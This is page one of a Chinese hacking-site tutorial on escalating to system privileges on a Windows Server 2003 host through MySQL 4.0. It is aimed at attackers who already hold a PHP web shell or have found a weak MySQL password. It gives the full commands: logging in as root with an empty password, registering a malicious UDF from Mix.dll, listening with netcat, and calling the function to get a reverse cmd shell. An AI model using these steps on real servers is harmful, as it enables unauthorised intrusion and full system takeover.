MySql本地提升演示

• 前段时间听说mysql利用Mix.dll可以直接拿到系统权限，我在本地测试了一下，效果不错，我是在windows server2003 sp1下测试的,测试MYSQL的版本是4.0.23,这个提升在什么情况能够利用呢?比如我们获得一个phpshell的情况下,没装serv-u,又没装pcanywhere,就装了一个mysql,所知的提升方法在这里也用不上,这时就可以用到这个方法了,在扫到MYSQL弱口令的情况下也能用上, 怎么把DLL文件传上去呢?请自行查看Mix的文章,我本地测试就不多此一举了,现在我们来看一下该怎么样弄的。我们先登陆MYSQL，开始-运行- CMD 跳到MYSQL的安装目录。输入mysql -uroot -p 用户名root 密码为空。好登陆成功，如图1
  
  
  好现在我们输入create function Mixconnect returns string soname 'c:\\Mix\\Mix.dll';　我们需要注册Mixconnect来执行系统命令。这里的c:\\mix\\mix.dll就是我本机的 Mix.dll的路径。输入后按回车，出现Qusery　OK等字样，那就是注册成功了。如图2
  
  
  好了显示注册成功，然后我们用NC监听1234端口，nc -l -p 1234 。如图3
  
  
  快到关键的时刻咯，时时关注此NC窗口。现在我们在登陆MYSQL的那个CMD窗口输入select Mixconnect('127.0.0.1','1234');然后按回车，就定在那里了，而监听的那个窗口已经成功得到一个cmdshell了。如图4
  
  
• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• MySql本地提升演示 相关文章：
• MySql本地提升演示 相关软件

上一篇:游戏私服安全攻防技巧之高级篇

下一篇:QQ挂号升级方法

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐